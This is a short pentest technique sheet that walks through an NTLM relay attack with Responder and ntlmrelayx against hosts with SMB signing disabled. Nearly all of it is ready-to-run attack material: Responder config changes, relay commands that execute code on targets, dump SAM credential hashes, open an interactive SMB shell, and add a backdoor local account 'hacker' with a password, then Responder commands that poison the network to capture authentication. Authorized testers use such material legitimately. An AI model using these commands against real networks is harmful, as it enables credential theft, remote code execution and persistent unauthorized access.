Technique Info

Prerequisites

  • Compile list of hosts with SMB signing disabled
  • Ensure you have network access to both source and target hosts
  • Verify targets are in scope for the engagement

Step 1: Configure Responder

  • Modify Responder configuration file:

    # Edit responder config file
    nano /etc/responder/Responder.conf
    # OR
    nano /usr/share/responder/Responder.conf
  • Disable SMB and HTTP in config:

   [Responder Core]
   ; Set SMB and HTTP to Off to avoid conflicts with ntlmrelayx
   SMB = Off
   HTTP = Off
   HTTPS = On
   LDAP = On
   RDP = On
   SQL = On
   FTP = On
   POP = On
   IMAP = On
   SMTP = On
   DNS = On

Step 2: Setup ntlmrelayx

  • Start ntlmrelayx with target list:
    # Basic relay to execute commands
    ntlmrelayx.py -tf targets.txt -c "whoami"
    
    # Relay and attempt to dump SAM
    ntlmrelayx.py -tf targets.txt --sam
    
    # Relay and get interactive SMB shell
    ntlmrelayx.py -tf targets.txt -i
    
    # Relay and execute specific command
    ntlmrelayx.py -tf targets.txt -c "net user hacker P@ssw0rd123 /add"
  • Alternative: Target specific host:
    # Single target
    ntlmrelayx.py -t 192.168.1.10 -c "whoami"

Step 3: Start Responder

  • Run Responder to capture authentication:
    # Basic responder on interface
    responder -I eth0 -A
    
    # Responder with analysis mode first (recommended)
    responder -I eth0 -A -f
    
    # Responder in verbose mode
    responder -I eth0 -v